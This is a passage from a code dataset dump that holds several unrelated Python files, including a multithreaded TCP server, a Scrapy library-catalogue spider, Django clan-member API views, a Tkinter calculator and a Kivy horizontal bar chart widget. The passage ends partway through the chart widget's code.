wait to connect again\r\n if self._connectionSocket != None : \r\n self._connectionSocket.close()\r\n\r\n# Main Function below\r\n\r\n# bind handler \r\nsignal.signal(signal.SIGINT, signal_handler)\r\nprint(\"The server is ready to receive on port\", serverPort)\r\n\r\n# set timer to 60 seconds\r\nrepeatTimer(60)\r\n\r\n# server process (listen)\r\nwhile True:\r\n \r\n # set connection with client\r\n (connectionSocket, clientAddress) = serverSocket.accept()\r\n print('Connection requested from', clientAddress)\r\n\r\n clientNumber += 1\r\n countOfTotalClient += 1\r\n print('Client {0} connected. Number of connected clients = {1}'.format(clientNumber, countOfTotalClient))\r\n\r\n t = MyThread(connectionSocket, clientAddress, clientNumber)\r\n t.start()\r\n threadArr.append(t)\r\n \r\n# close server socket\r\nif serverSocket != None :\r\n serverSocket.close()\r\n","sub_path":"MultiThreadTCPServer___.py","file_name":"MultiThreadTCPServer___.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"317147343","text":"__author__ = 'MarinaFomicheva'\n\n\ndef print_sentences(tgt, ref, outdir):\n\n it = open(tgt, 'r')\n ir = open(ref, 'r')\n o = open(outdir + '/' + 'phrases.txt', 'w')\n\n tgt_segs = it.readlines()\n ref_segs = ir.readlines()\n\n for i, phrase in enumerate(ref):\n\n o.write(str(i) + '\\t' + ref_segs[i].strip() + '\\n')\n o.write(tgt_segs[i].strip() + '\\n\\n')\n\n o.close()\n\n\n\n\n\n\n\n\n\n","sub_path":"print_sentences.py","file_name":"print_sentences.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430466337","text":"def _check_key(self, key):\n \"get a specific key from the result or it's items\"\n if (isinstance(self._result, dict) and (key in self._result)):\n return self._result.get(key, False)\n else:\n flag = False\n for res in self._result.get('results', []):\n if isinstance(res, dict):\n flag |= res.get(key, False)\n return flag","sub_path":"Data Set/bug-fixing-5/5a0621db554c310b110dbd8348c7ed48f11ba044-<_check_key>-fix.py","file_name":"5a0621db554c310b110dbd8348c7ed48f11ba044-<_check_key>-fix.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490803058","text":"def fizz_buzz():\n # your code here\n resultado = \"\"\n for x in range(1, 101):\n if calcularSiMultiplo(x, 3) == True:\n resultado = \"Fizz\"\n if calcularSiMultiplo(x, 5) == True:\n resultado = resultado + \"Buzz\"\n if(resultado == \"\"):\n resultado = x\n print(resultado)\n resultado = \"\"\n\ndef calcularSiMultiplo(numero, multiploDe):\n resto = numero % multiploDe\n if resto == 0 :\n return True\n else: \n return False\n \nfizz_buzz()","sub_path":"exercises/19-Looping-With-FizzBuzz/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"481643157","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom game.serializers.clan_members_serializers import (\n ClanMembersListSerializer,\n ClanMemberSerializer,\n ClanMemberJoinSerializer\n)\n\n\nclass ClanMembersListView(APIView):\n serializer_class = ClanMembersListSerializer\n model = serializer_class.Meta.model\n\n def get(self, request):\n clan_id = self._get_clan_id_from(request, 'clan_id')\n clan = self.model.objects.filter(id=clan_id)\n if clan.exists():\n clan = clan.first()\n return Response(self.serializer_class(clan).data, status.HTTP_200_OK)\n return Response({'Error': f'No clan with such id \"{clan_id}\"'}, status.HTTP_404_NOT_FOUND)\n\n @staticmethod\n def _get_clan_id_from(request, param):\n clan_id = request.GET.get(param)\n if not clan_id:\n if hasattr(request.user, 'clan_member'):\n clan_id = request.user.clan_member.clan.id\n return clan_id\n\n\nclass ClanMemberView(APIView):\n serializer_class = ClanMemberSerializer\n model = serializer_class.Meta.model\n\n def get(self, request):\n member_id = self._get_member_id_from(request)\n clan_member = self.model.objects.filter(user_id=member_id)\n if clan_member.exists():\n return Response(self.serializer_class(clan_member.first()).data, status=status.HTTP_200_OK)\n return Response({'Error': f'Clan member with such id \"{member_id}\" does not exist'}, status.HTTP_404_NOT_FOUND)\n\n @staticmethod\n def _get_member_id_from(request):\n member_id = request.GET.get('id')\n if not member_id and hasattr(request.user, 'clan_member'):\n member_id = request.user.id\n return member_id\n\n\nclass ClanMemberJoinView(APIView):\n serializer_class = ClanMemberJoinSerializer\n model = serializer_class.Meta.model\n\n def post(self, request):\n data = self._get_data_from(request)\n serializer = self.serializer_class(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.add_member()\n return Response({'OK': f'User was joined the clan'})\n\n @staticmethod\n def _get_data_from(request):\n data = {\n 'id': request.GET.get('id') or request.GET.get('clan_id'),\n 'user': request.user.id\n }\n return data\n\n\nclass ClanMemberLeaveView(APIView):\n\n @staticmethod\n def post(request):\n user = request.user\n if hasattr(user, 'clan_member'):\n clan = user.clan_member.clan\n clan.remove(user)\n return Response({'OK': f'User was removed from the clan'}, status.HTTP_200_OK)\n return Response({'Error': 'User not in clan'}, status.HTTP_400_BAD_REQUEST)\n","sub_path":"game/views/clan_member_views.py","file_name":"clan_member_views.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"101118992","text":"from scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nimport scrapy\nfrom dirbot.items import Booklist\n\n\nclass LibSpider(Spider):\n name = \"lib\"\n allowed_domains = [\"202.119.252.200\"]\n start_urls = [\n \"http://202.119.252.200:8080/opac/show_user_shelf.php?classid=0000003696\",\n \"http://202.119.252.200:8080/opac/show_user_shelf.php?classid=0000003628\",\n \"http://202.119.252.200:8080/opac/show_user_shelf.php?classid=0000003745\"\n ]\n\n def parse(self, response):\n \"\"\"\n The lines below is a spider contract. For more info see:\n http://doc.scrapy.org/en/latest/topics/contracts.html\n\n @url http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/\n @scrapes name\n \"\"\"\n sel = Selector(response)\n #sites = sel.xpath('//div/table/tr/td')\n urls = sel.xpath('//div/table/tr//td/a/@href').extract()\n\n for url in urls:\n tureurl = \"http://202.119.252.200:8080/opac/\" + url\n yield scrapy.Request(tureurl, callback = self.parse_new)\n \n def parse_new(self, response):\n items = []\n selx = Selector(response)\n sites = selx.xpath('//div[@id=\"s_c_left\"]')\n \n for site in sites:\n item = Booklist()\n item['name'] = selx.xpath('//div/dl[1]/dd[1]/a/text()').extract()\n item['number'] = selx.xpath('//div/table/tr/td[@bgcolor=\"#FFFFFF\"][1]/text()').extract()\n item['site'] = selx.xpath('//div/table/tr/td[@bgcolor=\"#FFFFFF\"][5]/text()').extract()\n item['cond'] = selx.xpath('//div/table/tr/td[@bgcolor=\"#FFFFFF\"][7]/text()|//div/table/tr/td[7]//font/text()').extract()\n items.append(item)\n\n return items\n","sub_path":"dirbot/spiders/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351356041","text":"'''PROGRAM TO DESIGN A GUI BASED CALCULATOR USING Tkinter.'''\n\n#Importing Tk,Entry,END,Button from tkinter module\nfrom tkinter import Tk,Entry,END,Button\n\n#Creating a window\nroot = Tk()\nroot.title(\"Simple Calculator\")\n\n#Entry \ne = Entry(root , width = 35, borderwidth = 5)\ne.grid(row = 0 , column = 0 , columnspan = 3 , padx = 10, pady = 10)\n\n#Function commands\ndef click(number):\n current = e.get()\n e.delete(0,END)\n e.insert(0, str(current) + str(number))\n \ndef clear():\n e.delete(0,END)\n \ndef add():\n f_n = e.get()\n global f_num\n global math\n math = \"addition\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef sub():\n f_n = e.get()\n global f_num\n global math\n math = \"subtraction\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef mul():\n f_n = e.get()\n global f_num\n global math\n math = \"multiplication\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef div():\n f_n = e.get()\n global f_num\n global math\n math = \"division\"\n f_num = int(f_n)\n e.delete(0,END)\n \ndef equal():\n s_num = int(e.get())\n e.delete(0, END)\n if math == \"addition\":\n e.insert(0 , f_num + s_num)\n elif math == \"subtraction\":\n e.insert(0 , f_num - s_num)\n elif math == \"multiplication\":\n e.insert(0 , f_num * s_num)\n elif math == \"division\":\n e.insert(0 , f_num / s_num)\n\n#Define buttons\nbt1 = Button(root, text = \"1\", padx = 40 , pady = 20, command = lambda : click(1))\nbt2 = Button(root, text = \"2\", padx = 40 , pady = 20, command = lambda : click(2))\nbt3 = Button(root, text = \"3\", padx = 40 , pady = 20, command = lambda : click(3))\nbt4 = Button(root, text = \"4\", padx = 40 , pady = 20, command = lambda : click(4))\nbt5 = Button(root, text = \"5\", padx = 40 , pady = 20, command = lambda : click(5))\nbt6 = Button(root, text = \"6\", padx = 40 , pady = 20, command = lambda : click(6))\nbt7 = Button(root, text = \"7\", padx = 40 , pady = 20, command = lambda : click(7))\nbt8 = Button(root, text = \"8\", padx = 40 , pady = 20, command = lambda : click(8))\nbt9 = Button(root, text = \"9\", padx = 40 , pady = 20, command = lambda : click(9))\nbt0 = Button(root, text = \"0\", padx = 40 , pady = 20, command = lambda : click(0))\nbtadd = Button(root, text = \"+\", padx = 39 , pady = 20, command = add)\nbtsub = Button(root, text = \"-\", padx = 41 , pady = 20, command = sub)\nbtmul = Button(root, text = \"*\", padx = 40 , pady = 20, command = mul)\nbtdiv = Button(root, text = \"/\", padx = 41 , pady = 20, command = div)\n \nbtEquals = Button(root, text = \"=\", padx = 90 , pady = 20, command = equal)\nbtClear = Button(root, text = \"Clear\", padx = 79 , pady = 20, command = clear)\n \nbt1.grid(row = 3, column = 0)\nbt2.grid(row = 3, column = 1)\nbt3.grid(row = 3, column = 2)\n \nbt4.grid(row = 2, column = 0)\nbt5.grid(row = 2, column = 1)\nbt6.grid(row = 2, column = 2)\n \nbt7.grid(row = 1, column = 0)\nbt8.grid(row = 1, column = 1)\nbt9.grid(row = 1, column = 2)\n \nbt0.grid(row = 4, column = 0 )\nbtadd.grid(row = 5, column = 0 )\nbtEquals.grid(row = 5, column = 1, columnspan = 2)\nbtClear.grid(row = 4, column = 1, columnspan = 2)\nbtsub.grid(row = 6, column = 0 )\nbtmul.grid(row = 6, column = 1 )\nbtdiv.grid(row = 6, column = 2 )\nroot.mainloop()","sub_path":"Week 7/Program6.py","file_name":"Program6.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"101208638","text":"# Standard library imports\n\nfrom datetime import timedelta\nfrom colorsys import rgb_to_hsv\n\n# Kivy imports\n\nfrom kivy.core.window import Window\nfrom kivy.graphics import Color, Line, Rectangle\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import BooleanProperty, NumericProperty\n\n\nclass Chart(Widget):\n font_width_ratio = 0.67\n font_name = 'RobotoMono-Regular'\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01\n h_axis_height_factor = 0.05\n legend_area_height = 0.05\n title_area_height = 0.05\n minimal_height = 300\n minimal_width = 100\n min_font_size = NumericProperty(16)\n\n def __init__(self):\n super().__init__()\n\n\nclass Hbarchart(Chart):\n grid_widget = None\n max_label_lenght = 63\n black = BooleanProperty(True)\n grid = BooleanProperty(True)\n stacked_colors = [(0.1, 0.5, 0), (0.38, 0.59, 0),\n (0.6, 0.62, 0), (204, 164, 0), (1, 0.65, 0)]\n one_color = [(1, 0, 0)]\n grid_counter = 0\n unit = '-'\n slices = 11\n time = False\n lang_dict = {'day': 'day', 'days': 'days'}\n legend = []\n title = ''\n values = [['0']]\n labels = ['label']\n pareto = False\n pareto_color_ads = [0.5, 0.2, 0.0]\n pareto_limits = [0.70, 0.90, 1.00]\n pareto_labels = ['(70%)', '(20%)', '(10%)']\n\n def __init__(self, **kwargs):\n '''\n values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'},\n legend = []\n '''\n super(Hbarchart, self).__init__()\n\n self.bind(size=self.new)\n self.bind(black=self.toggle_colors)\n self.bind(grid=self.toggle_grid)\n\n self.new(self, **kwargs, init=True)\n\n def new(self, *args, **kwargs):\n '''\n values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'}, \n legend = []\n '''\n if not 'init' in kwargs or 'init' in kwargs and not kwargs['init']:\n self.clear_widgets()\n self.canvas.clear()\n\n if 'values' in kwargs:\n self.values = kwargs.pop('values')\n if 'labels' in kwargs:\n self.labels = kwargs.pop('labels')\n if 'hints' in kwargs:\n self.hints = kwargs.pop('hints')\n if 'h_axis_height_factor' in kwargs:\n self.units_area_factors = kwargs.pop('h_axis_height_factor')\n if 'legend_area_height' in kwargs:\n self.legend_area_height = kwargs.pop('legend_area_height')\n if 'title_area_height' in kwargs:\n self.title_area_height = kwargs.pop('title_area_height')\n if 'unit' in kwargs:\n self.unit = kwargs.pop('unit')\n if 'slices' in kwargs:\n self.slices = kwargs.pop('slices')\n if 'time' in kwargs:\n self.time = kwargs.pop('time')\n if 'lang_dict' in kwargs:\n self.lang_dict = kwargs.pop('lang_dict')\n if 'legend' in kwargs:\n self.legend = kwargs.pop('legend')\n if 'title' in kwargs:\n self.title = kwargs.pop('title')\n if 'min_font' in kwargs:\n self.min_font_size = kwargs.pop('min_font')\n if 'pareto' in kwargs:\n self.pareto = kwargs.pop('pareto')\n\n self._hbarchart()\n\n def _hbarchart(self):\n # General actions\n self._prepare_data()\n self._get_parameters()\n\n if self.parent:\n # Draw chart\n self._draw_background()\n self._draw_grid()\n self._draw_record_labels()\n self._draw_rectangles()\n self._draw_legend()\n self._draw_title()\n\n def _get_parameters(self):\n # Calculate chart cords\n self.cords = {}\n self.cords['x'] = self.pos[0] + self.hints['left'] * self.size[0]\n self.cords['y'] = self.pos[1] + self.hints['bottom'] * self.size[1]\n self.cords['x2'] = self.pos[0] + \\\n self.size[0] * (1 - self.hints['right'])\n self.cords['y2'] = self.pos[1] + self.size[1] * (1 - self.hints['top'])\n\n # Calculate spaces\n self.middle_space = self.size[0] * self.mid_space_factor\n self.axis_labels_space = self.size[1] * self.h_axis_height_factor\n self.top_extra_hints = 0\n\n if len(self.legend) > 0:\n self.top_extra_hints += self.legend_area_height * self.size[1]\n if len(self.title) > 0:\n self.top_extra_hints += self.title_area_height * self.size[1]\n\n self.drawing_height = self.cords['y2'] - self.cords['y'] \\\n - self.axis_labels_space - self.top_extra_hints\n\n # Calculate records height\n number_of_records = max(len(self.labels), len(self.values))\n\n if number_of_records is 1:\n self.record_height = 0.25 * self.drawing_height\n else:\n self.record_height = self.drawing_height / number_of_records\n self.rect_height = self.record_height * 0.75\n\n # Calculate minimal widget size\n self.minimal_height = max(\n self.min_font_size * number_of_records * 1.35,\n 300)\n\n self.minimal_width = max(\n self.min_font_size * self.font_width_ratio\n * self.max_label_lenght * 1.85, 100)\n\n # Calculate input font parameters\n self.records_font_size = min(\n self.size[1] * 0.1, self.record_height - 1)\n if len(self.labels) is 0:\n self.greatest_char_count = 0\n else:\n self.greatest_char_count = max(\n [len(label) for label in self.labels])\n self.max_label_width = 0.5 * self.size[0]\n\n # Calculate font size\n for i in range(int(self.records_font_size)):\n actual_label_width = self.font_width_ratio * self.records_font_size \\\n * self.greatest_char_count\n if actual_label_width <= self.max_label_width:\n break\n else:\n self.records_font_size -= i\n\n # Calculate labels width\n self.labels_width = self.font_width_ratio * \\\n self.records_font_size * self.greatest_char_count\n\n # General font size\n approximate_unit_area_width = max(\n 0.05 * self.size[0],\n 3 * self.min_font_size * self.font_width_ratio)\n drawing_width = self.cords['x2'] + approximate_unit_area_width \\\n - self.cords['x'] - self.labels_width - self.middle_space\n self.general_font_size = max(\n min(drawing_width * 0.03, self.drawing_height * 0.02),\n self.min_font_size)\n\n # Unit area width\n self.unit_with_brackets = '[{}]'.format(self.unit)\n self.unit_area_width = len(\n self.unit_with_brackets) * self.general_font_size\n\n # Calculate drawing cords\n self.drawing_cords = {}\n self.drawing_cords['x'] = self.cords['x'] + self.labels_width \\\n + self.middle_space\n self.drawing_cords['y'] = self.cords['y'] + self.axis_labels_space\n self.drawing_cords['x2'] = self.cords['x2'] - self.unit_area_width\n self.drawing_cords['y2'] = self.cords['y2'] - self.top_extra_hints\n\n # Other calculations\n self.general_labels_height = self.general_font_size + 1\n self.pixels_per_character = self.general_font_size * self.font_width_ratio\n\n def _prepare_data(self):\n # Convert labels to string and trim too long ones\n for i, label in enumerate(self.labels):\n self.labels[i] = str(self.labels[i])\n if len(label) > self.max_label_lenght:\n self.labels[i] = self.labels[i][:self.max_label_lenght - 3] + '...'\n\n if not self.time:\n\n if type(self.values[0]) is list:\n for i, row in enumerate(self.values):\n for j, value in enumerate(row):\n self.values[i][j] = float(value)\n else:\n for i, value in enumerate(self.values):\n self.values[i] = float(value)\n\n def _draw_record_labels(self):\n # Draw record labels\n x_start = self.pos[0] + self.hints['left'] * self.size[0]\n rectangle_labels = Widget()\n for i in range(len(self.labels)):\n label = Label(text=self.labels[i],\n pos=(x_start,\n self.drawing_cords['y'] + self.record_height * i),\n size=(self.labels_width, self.rect_height),\n halign='right',\n valign='middle',\n font_size='{}sp'.format(self.records_font_size),\n font_name=self.font_name,\n text_size=(self.labels_width, self.record_height),\n color=self.contour_color)\n rectangle_labels.add_widget(label)\n self.add_widget(rectangle_labels)\n\n def _draw_rectangles(self):\n # Draw rectangles\n with self.canvas:\n value_list_lenght = len(self.values)\n\n # Detect value of longest bar\n max_value = 0\n bar_values = []\n for i in range(value_list_lenght):\n if type(self.values[i]) is list:\n bar_value = sum(self.values[i])\n else:\n bar_value = self.values[i]\n if bar_value > max_value:\n max_value = bar_value\n bar_values.append(bar_value)\n\n # Iterate by record\n aggregated_column_share = 0\n sum_of_values = sum(bar_values)\n for i in range(value_list_lenght):\n # Calculate bar width\n max_rect_width = \\\n self.drawing_cords['x2'] - self.drawing_cords['x']\n if max_value > 0:\n bar_width = max_rect_width * bar_values[i] / max_value\n else:\n bar_width = 0\n\n if type(self.values[i]) is list:\n no_of_slices = len(self.values[i])\n else:\n if max_value > 0:\n percentage_column_share = bar_values[i] / sum_of_values\n aggregated_column_share += percentage_column_share\n else:\n percentage_column_share = 0\n\n no_of_slices = 1\n\n if self.pareto:\n if aggregated_column_share <= self.pareto_limits[0]:\n add = self.pareto_color_ads[0]\n elif aggregated_column_share <= self.pareto_limits[1]:\n add = self.pareto_color_ads[1]\n elif aggregated_column_share > self.pareto_limits[1]:\n add = self.pareto_color_ads[2]\n else:\n add = 0.5\n\n # Color\n color = rgb_to_hsv(*self.one_color[0])\n Color(color[0],\n (0.5 + add),\n color[2],\n mode='hsv')\n\n # Iterate by slice\n done_width = 0\n slice_width = bar_width\n for j in range(no_of_slices):\n if no_of_slices > 1:\n if bar_values[i] > 0:\n slice_width = self.values[i][j] / \\\n bar_values[i] * bar_width\n else:\n slice_width = 0\n\n # Color\n if no_of_slices is 2:\n if j is 0:\n Color(*self.stacked_colors[0])\n else:\n Color(*self.stacked_colors[2])\n else:\n Color(*self.stacked_colors[j % 5])\n\n Rectangle(pos=(self.drawing_cords['x'] + done_width,\n self.drawing_cords['y'] + self.record_height * i),\n size=(slice_width, self.rect_height))\n\n done_width += slice_width\n\n def _draw_background(self):\n # Draw background color\n if self.black:\n self.background_color = [0, 0, 0, 1]\n self.contour_color = [1, 1, 1, 1]\n else:\n self.background_color = [1, 1, 1, 1]\n self.contour_color = [0, 0, 0, 1]\n with self.canvas:\n Color(*self.background_color)\n Rectangle(size=self.size, pos=self.pos)\n\n def _draw_grid(self):\n # Draw grid\n if self.grid and self.grid_widget not in self.children:\n self.grid_widget = Widget()\n chart_width = self.drawing_cords['x2'] - self.drawing_cords['x']\n\n # Add markers\n with self.grid_widget.canvas:\n Color(*self.contour_color)\n # Add horizontal axis\n Line(bezier=(self.drawing_cords['x'], self.drawing_cords['y'],\n self.drawing_cords['x2'], self.drawing_cords['y']))\n # Add frame\n Line(points=(self.drawing_cords['x'], self.drawing_cords['y'],\n self.drawing_cords['x'], self.drawing_cords['y2'],\n self.drawing_cords['x2'], self.drawing_cords['y2'],\n self.drawing_cords['x2'], self.drawing_cords['y']))\n\n # Add vertical lines\n for i in range(self.slices + 1):\n increment = chart_width / self.slices * i\n Line(points=(\n self.drawing_cords['x'] + increment, self.drawing_cords['y'] -\n self.drawing_height * 0.01,\n self.drawing_cords['x'] + increment, self.drawing_cords['y2']))\n\n # Add grid values\n\n axis_tick_label_pixels = []\n axis_tick_labels = []\n\n if type(self.values[0]) is list:\n max_val = max([sum(instance) for instance in self.values])\n else:\n max_val = max(self.values)\n\n # Calculate tick label value with correct precision\n counter = 0\n label_values = []\n precision = 0\n while counter <= self.slices:\n if precision == 0:\n label_value = round(max_val / self.slices * counter)\n else:\n label_value = round(\n max_val / self.slices * counter, precision)\n if max_val > 0:\n if label_value in label_values:\n precision += 1\n counter = 0\n label_values = []\n else:\n label_values.append(label_value)\n counter += 1\n else:\n label_values.append(label_value)\n counter += 1\n\n for i in range(self.slices + 1):\n label_value = label_values[i]\n # If label is a time type translate to timedelta\n if self.time:\n label_value = self.seconds_to_timedelta(label_value)\n\n label_value = str(label_value)\n\n if self.lang_dict.values is not {'day', 'days'}:\n # Translate period names into other language\n label_value = label_value.replace(\n 'days', self.lang_dict['days'])\n label_value = label_value.replace(\n 'day', self.lang_dict['day'])\n\n axis_tick_labels.append(label_value)\n\n # Calculate label lenght in pixels and add to list\n axis_tick_label_pixels.append(\n len(axis_tick_labels[i]) * self.pixels_per_character)\n\n max_lab_lenght = max(axis_tick_label_pixels)\n val_start_pos = (self.drawing_cords['x'],\n self.drawing_cords['y'] - self.drawing_height * 0.03)\n increment = 0\n\n # Decide whether vertical offset is needed\n if max_lab_lenght > 0.8 * chart_width / self.slices:\n v_offset = self.general_font_size\n else:\n v_offset = 0\n\n for i in range(self.slices + 1):\n increment = chart_width / self.slices * i\n\n label_value = Label(\n text='{}'.format(axis_tick_labels[i]),\n pos=(val_start_pos[0] + increment - axis_tick_label_pixels[i] / 2,\n val_start_pos[1] - (i % 2) * v_offset),\n size=(axis_tick_label_pixels[i],\n self.general_labels_height),\n font_size='{}sp'.format(self.general_font_size),\n font_name=self.font_name,\n text_size=(\n axis_tick_label_pixels[i], self.general_font_size),\n halign='center',\n valign='center',\n color=self.contour_color)\n self.grid_widget.add_widget(label_value)\n\n # Add unit\n if not v_offset or (self.slices + 1) % 2:\n unit_v_offset = self.general_font_size\n else:\n unit_v_offset = 0\n\n unit_pos = (self.drawing_cords['x2'] + self.unit_area_width / 2,\n val_start_pos[1] - unit_v_offset)\n unit_label = Label(text=self.unit_with_brackets,\n pos=unit_pos,\n size=(self.unit_area_width,\n self.general_labels_height),\n halign='center',\n valign='center',\n font_size='{}sp'.format(self.general_font_size),\n font_name=self.font_name,\n text_size=(self.unit_area_width,\n self.general_labels_height),\n color=self.contour_color)\n self.grid_widget.add_widget(unit_label)\n\n self.add_widget(self.grid_widget)\n\n def _draw_legend(self):\n if len(self.legend) > 0:\n self.legend_widget = Widget()\n\n if len(self.legend) is 1:\n colors = list(self.one_color)\n else:\n colors = list(self.stacked_colors)\n\n for i in range(len(colors)):\n colors[i] = rgb_to_hsv(*colors[i])\n\n new_legend = []\n new_colors = []\n if self.pareto and len(self.legend) is 1:\n\n for i in range(3):\n new_legend.append(\n '{} {}'.format(self.legend[0], self.pareto_labels[i]))\n new_colors.append((colors[0][0], 0.5 + self.pareto_color_ads[i],\n colors[0][2]))\n else:\n new_legend = self.legend\n new_colors = colors\n\n chart_width = self.drawing_cords['x2'] - self.drawing_cords['x']\n legend_level = self.drawing_cords['y2'] + 0.01 * self.size[1]\n one_character_width = self.general_font_size * self.font_width_ratio\n legend_lenght = len(new_legend)\n after_label_offset = chart_width * 0.015\n before_label_offset = one_character_width\n max_stripe_lenght = 0.1 * chart_width\n center = self.drawing_cords['x'] + chart_width / 2\n\n all_after_offset = (legend_lenght - 1) * after_label_offset\n all_before_offset = legend_lenght * before_label_offset\n all_offset = all_after_offset + all_before_offset\n\n label_widths = []\n total_labels_width = 0\n for i in range(legend_lenght):\n width = one_character_width * len(new_legend[i])\n label_widths.append(width)\n total_labels_width += width\n\n space_for_stripes = chart_width - total_labels_width - all_offset\n\n space_for_one_stripe = space_for_stripes / legend_lenght\n if space_for_one_stripe > max_stripe_lenght:\n space_for_one_stripe = max_stripe_lenght\n\n space_for_stripes = space_for_one_stripe * legend_lenght\n stripes_and_labels = space_for_stripes + total_labels_width\n\n centered_start_pos = center - (stripes_and_labels + all_offset) / 2\n\n with self.legend_widget.canvas:\n current_offset = 0\n for i in range(legend_lenght):\n ii = i % 5\n Color(*new_colors[ii], mode='hsv')\n Rectangle(pos=(centered_start_pos + current_offset,\n legend_level),\n size=(space_for_one_stripe, self.general_labels_height))\n\n self.legend_widget.add_widget(\n Label(text=new_legend[i],\n pos=(centered_start_pos + current_offset\n + space_for_one_stripe + one_character_width,\n legend_level),\n size=(label_widths[i],\n self.general_labels_height),\n font_name=self.font_name,\n font_size='{}sp'.format(self.general_font_size),\n color=self.contour_color))\n\n current_offset += space_for_one_stripe + label_widths[i] \\\n + after_label_offset + before_label_offset\n\n self.add_widget(self.legend_widget)\n\n def _draw_title(self):\n title_lenght = len(self.title)\n\n if title_lenght:\n if len(self.legend):\n y = self.drawing_cords['y2'] + \\\n self.legend_area_height * self.size[1]\n else:\n y = self.drawing_cords['y2']\n\n title_width = self.drawing_cords['x2'] - self.drawing_cords['x']\n\n title_height = self.font_width_ratio * self.records_font_size\n self.title_font_size = self.general_font_size * 1.5\n self.title_labels_height = self.title_font_size + 1\n\n self.one_character_width = self.font_width_ratio * self.title_font_size\n max_title_lenght = round(\n title_width / self.one_character_width) - 3\n\n if title_lenght > max_title_lenght:\n title = self.title[:(max_title_lenght + 1)] + '...'\n else:\n title = self.title\n\n title = Label(text=title,\n pos=(self.drawing_cords['x'], y),\n size=(title_width, self.title_labels_height),\n font_size=self.title_font_size,\n font_name=self.font_name,\n color=self.contour_color)\n\n self.add_widget(title)\n\n def toggle_grid(self, *args):\n if not self.grid and self.grid_widget in self.children:\n self.remove_widget(self.grid_widget)\n elif self.grid and self.grid_widget not in self.children:\n self.grid_widget = None\n self._draw_grid()\n overdraw_limit = 5\n if self.grid_counter < overdraw_limit:\n self._draw_rectangles()\n self.grid_counter += 1\n else:\n self.new()\n self.grid_counter = 0\n\n def toggle_colors(self, *args):\n # Draw chart\n self.clear_widgets()\n self.canvas.clear()\n self._draw_background()\n self._draw_grid()\n self._draw_record_labels()\n self._draw_rectangles()\n self._draw_legend()\n self._draw_title()\n\n # Auxiliary methods\n\n @staticmethod\n def seconds_to_timedelta(seconds):\n '''Convert seconds (int or float) into timedelta object'''\n timedelta_object = timedelta(seconds=seconds)\n return timedelta_object\n\n\nclass Hbarchart_With_Scroll(ScrollView):\n\n def __init__(self, *args, **kwargs):\n '''\n values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'}, \n legend = []\n '''\n super(Hbarchart_With_Scroll, self).__init__()\n self.bind(size=self.resize)\n self.new(**kwargs)\n\n def new(self, *args, **kwargs):\n '''\n values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'}, \n legend = []\n '''\n\n if len(self.children) > 0:\n self.chart.new(**kwargs, min_font=self.get_min_font())\n self.box.clear_widgets()\n self.box.size = (self.get_chart_width(), self.get_chart_height())\n self.box.add_widget(self.chart)\n else:\n self.chart = Hbarchart(**kwargs, min_font=self.get_min_font())\n self.box = BoxLayout(size_hint_y=None,\n size_hint_x=None,\n height=self.get_chart_height(),\n width=self.get_chart_width())\n self.box.add_widget(self.chart)\n self.add_widget(self.box)\n\n def resize(self, *args):\n # Change dimension only when is inappropriate\n\n correct_heigth = self.get_chart_height()\n if self.box.height is not correct_heigth:\n self.box.height = correct_heigth\n\n correct_width = self.get_chart_width()\n if self.box.width is not correct_width:\n self.box.width = correct_width\n \n self.scroll_wheel_distance = 0.15 * self.box.height\n\n def get_min_font(self):\n min_font = int(self.size[1] * 0.013)\n if min_font < 10:\n min_font = 10\n return min_font\n\n def get_chart_height(self):\n return max(self.size[1], self.chart.minimal_height)\n\n def get_chart_width(self):\n return max(self.size[0], 